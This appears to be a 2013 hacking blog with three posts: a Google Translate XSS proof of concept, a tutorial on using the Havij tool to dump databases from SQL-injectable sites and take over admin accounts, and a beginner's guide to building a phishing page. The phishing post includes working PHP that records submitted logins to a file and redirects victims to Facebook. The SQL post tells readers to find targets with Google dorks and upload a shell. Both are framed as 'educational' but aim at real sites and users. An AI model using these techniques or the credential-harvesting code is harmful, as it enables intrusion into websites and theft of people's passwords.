Thursday, November 14, 2013

XSS Vulnerability in translate.googleusercontent.com

Hi everyone. Today I came up with a XSS vulnerability in translate.googleusercontent.com. But as in Program Rules - Application Security - Google bugs like XSS in sanbox domains do not qualify for a bounty and are not considered as bugs.
To reproduce this XSS you have to go to translate a document page in Google Translate. Then you just need to create a .txt document by writing these lines to translate.
Script to write in the .txt file:
<script>alert("hacked")</script>

After you have created your .txt file upload it to the page and hit translate. But make sure you are translating it to a language other than English, or else it will not work. And you got XSS in translate.googleusercontent.com.
Posted by at No comments:

Sunday, November 10, 2013

SQL injecting using "Havij - Advanced SQL Injection Tool" [TUT]



Hello guys, Today I'm going to teach you guys how to exploit SQL vulnerable sites using Havij Automatic (Advance SQL Injection Tool).
So lets start the tutorial to hack a website using Havij.

By SQL injecting you will get the Website's Database. First you should know what a Database is.

The Website Database is a collection of Information like Images, Login ID's, Password, Company Data, etc.
That is all stored in a Server Database so that it can be easily acessed, managed and updated. In one view,
databases can be classified according to types of content : Bibilographic, full-text, numeric, and Images etc.

What is Havij ?
Havij Pro is an advanced SQLi Vulnerability Exploiter, that can Exploit SQL Injection Vulnerability in Website
and and get accessed into website database. Havij is Automatic Advance SQLi Tool.

So lets start it.
First using Havij is an easy way.There aren't any complicated steps to be followed unlike when you are manualy injecting it.
But you wouldn't know what actually Havij is doing if you haven't learned manual SQL injection.

Things you will need :

Havij Pro (Google it or comment if you can't find it)
A website Vulnerable ro SQL (You can use Google dorks to find)
And probably a BRAIN. :P
NOTE: If you want to find  SQL in a particular your desired website, you can use Acunetix or Owasp vulnerability scanner.
   
The real deal comes here.[EASY]

After you have found SQL vulnerability in a website.
Enter Website URL into Target box and Analyze it.
After Analyzing you can see that, It will find Database name, Tables and other things.
Always keep your an eye on STATUS BOX [Log]

And now, We got Database name and Tables, Let's find out Columns and Data of Emails, Users, Password etc.
Now after getting Database name, you can see that "Tables" button is activated and we can read Tables.
Just click on "Tables" and you will get table.
Here, we are Successful in finding database Table, now it's time to find Database Row and Columns,
So now click on Get DBs.
DBs will load all Database to Program and it can be easily access-able. Now again click on Get Tables.

Finally we got up 'users' table, Now select users and click on 'Get Columns'.

After Getting Columns and all.. Finally Click on 'Get Data' and you will get all login ID and passwords.

So, here we got up Website Admin ID and Password. Now finally you have to decrypt the password if it is hashed.[ In  most websites passwords are hashed]
Now, it's time to Enter into Website using this Two Admin login ID and Password.
To get the Admin page Click on 'Find Admin' and click on start to Analyze the admin page.
Now go to that URL of admin and Login with ID and password you got from Database. Now you have successfully hacked into a website.
You just need to upload the shell and do much more exciting things.
If you don't have a Vulnerable Website then Just Create Penetration testing lab in your Computer like OWASP-BWA, DVWA etc.

NOTE: This article is for educational purposes only. I am not responsible for any misuse of this article. Remember that hacking is illegal in most of the countries. You can create a Pentesting lab and test your skills there.
Posted by at No comments:

Saturday, November 9, 2013

Phishing Page [TUT] - Noob Freindly



Phishing has become a very easy to use trick to hack usernames and passwords of users.
Today I will teach you guys how to create phishing page for almost any site which uses login form (for example:Facebook,
 Gmail, Yahoo, etc)
For makin a phishing page and using this method of hacking you need a hosting site(Google it for free web hosting sites)
or your website also.
Register yourself at a free hosting site.

Note: This article is for only educational purposes. Please do not attempt this method on real users. I am not responsible for any damage caused by this.

Well as now you have a hosting account, lets start to create the Phising Page
Step one.
First go to the target site. In your browser select Save As from the File menu and save the site on
 your computer with name "login.html" .

or alternatively right click on the page and click "view source" and copy all of it and save them to a notepad file.
Rename the file with "login.html".

Now the step two.
Open up your Notepad and copy this into it

<?php
header ('Location: http://www.facebook.com');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value)
 {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Replace facebook.com with the URL you want the user to redirect after he click on login button.
Save the page as Phish.php

Now you need to edit the "login.htm" file we have saved earlier. So navigate to that and open it with notepad.
now search for any html like "action=" which has something with login. And replace the URL with "Phish.php".

Also create a blank txt file with name "log.txt". This file would be used to save the victims logins and passwords.
Now you are done with making the Phishing Page.

Go to your hosting account and upload all the files to your server. You should upload all three files
Now go to the URL provided by your host.

Like - http://faceboook-1.hostingsite.com/login.htm

And you would see the Phishing page as it is in the real site.
For testing type anything on the login and password field and hit login button.

Check the log.txt file. The password and username you entered previously would be saved in the log.txt file.
WOW, you just have your own phishing page now.

Note: If you have any doubts or where to create a hosting account feel free to comment. I will try to reply to you as soon as possible.
ONCE AGAIN NOTE: This article is for only educational purposes. Please do not attempt this method on real users. I am not responsible for any damage caused by this.
Posted by at No comments:
Subscribe to: Comments (Atom)